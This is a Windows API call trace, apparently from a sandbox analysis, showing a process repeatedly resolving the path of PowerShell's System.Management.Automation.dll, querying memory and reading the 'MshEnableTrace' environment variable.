	[0304.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad170, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ad110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.088] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0304.088] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.088] CoTaskMemFree (pv=0x3298d0) 
	[0304.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.088] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.089] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.090] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.091] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.092] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.093] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.094] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.095] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.096] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.097] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.107] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.108] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.932] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.933] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1ac0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0304.933] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.933] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0304.934] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.934] CoTaskMemFree (pv=0x3298d0) 
	[0304.935] VirtualQuery (in: lpAddress=0x1ab810, lpBuffer=0x1ac6d0, dwLength=0x30 | out: lpBuffer=0x1ac6d0*(BaseAddress=0x1ab000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0304.937] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0304.937] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.937] CoTaskMemFree (pv=0x3298d0) 
	[0304.938] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0304.938] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.938] CoTaskMemFree (pv=0x3298d0) 
	[0304.938] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0304.938] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.938] CoTaskMemFree (pv=0x3298d0) 
	[0304.939] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
	[0304.939] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3298d0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0304.939] CoTaskMemFree (pv=0x3298d0) 
	[0304.940] CoTaskMemAlloc (cb=0x104) returned 0x3298d0
